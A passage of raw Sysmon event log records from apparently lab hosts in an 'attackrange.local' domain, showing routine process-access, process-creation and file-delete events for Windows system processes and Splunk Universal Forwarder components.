Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5A4E12E1B72A331A49B564700F28826,SHA256=D289A9E006A32039BFD53E3D11A1A8C7ADC4AC089074AF2C3B76CDA8935DD9E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061117Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.050{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061116Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.050{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530910Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:21.330{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530909Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:21.330{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=675AED429348D8189FAC0BCA98881E04,SHA256=756D57E0E13EC0A38B52AA4918247E63BE8A4416E601DEB743602363542E38D1falsefalse - insufficient disk space 10341000x80000000000000001061148Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.983{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-612D-6080-9A5C-00000000BA01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061147Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.981{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061146Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.981{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061145Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.981{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061144Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.981{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061143Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.980{761B69BB-818A-607D-0500-00000000BA01}408424C:\Windows\system32\csrss.exe{761B69BB-612D-6080-9A5C-00000000BA01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001061142Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.980{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-612D-6080-9A5C-00000000BA01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061141Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.979{761B69BB-612D-6080-9A5C-00000000BA01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061140Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.820{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2C06EE18AA7ED4217F8AAF73121B041,SHA256=8F484C24239BDFB60469E12ADC5DB6854D0D211F39EDB701A7F2270BC71CD3AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061139Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.605{761B69BB-612D-6080-995C-00000000BA01}57848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061138Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.465{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-612D-6080-995C-00000000BA01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061137Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.463{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061136Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.463{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061135Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.463{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061134Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.463{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061133Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.463{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-612D-6080-995C-00000000BA01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001061132Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.463{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-612D-6080-995C-00000000BA01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061131Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.462{761B69BB-612D-6080-995C-00000000BA01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061130Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.104{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7296F310D468F55A07F6E3513F11DA11,SHA256=70BAD87D96FE79F5E95020F2B7FCB751FF886E7A94665B1F5DCCD7A6061A1ADC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061129Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.051{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061128Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.051{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530912Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:22.333{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530911Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:22.333{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AFE6D3D026F32B84AE70AC944147E66,SHA256=1FCBB6378B5329849BA0E9B407E68E86182587553B89E437DE15AEC05558825Cfalsefalse - insufficient disk space 23542300x80000000000000001061152Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:22.986{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC1F0F0760DEE4FA1D54A3EA6558D98C,SHA256=73DA9CF5BCF4A6DA4A4B177344EA4C9FC8CC14756D8488B5F35B7E1B6CD85F0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061151Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:22.117{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48E1386C1D15E67A798559BF9D178808,SHA256=0322FEB431EEDBFC0CEF5FA1351747A530ECF86851D78523906B18DEBA38077F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061150Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:22.051{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061149Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:22.051{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530914Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:23.420{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530913Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:23.420{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E796A3E7CB32BF9653412532A4A614E1,SHA256=332EF9990E8013757F96765B73DB03199C83DFB4213DC1EEE5E6D2459BEEF5CDfalsefalse - insufficient disk space 23542300x80000000000000001061155Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:23.126{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47C1B7D5E2389D23A726BBA020581792,SHA256=E110070B6A162BDE74FB5AD7972F972E0401468411B8886D5D2749CA14B3026F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061154Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 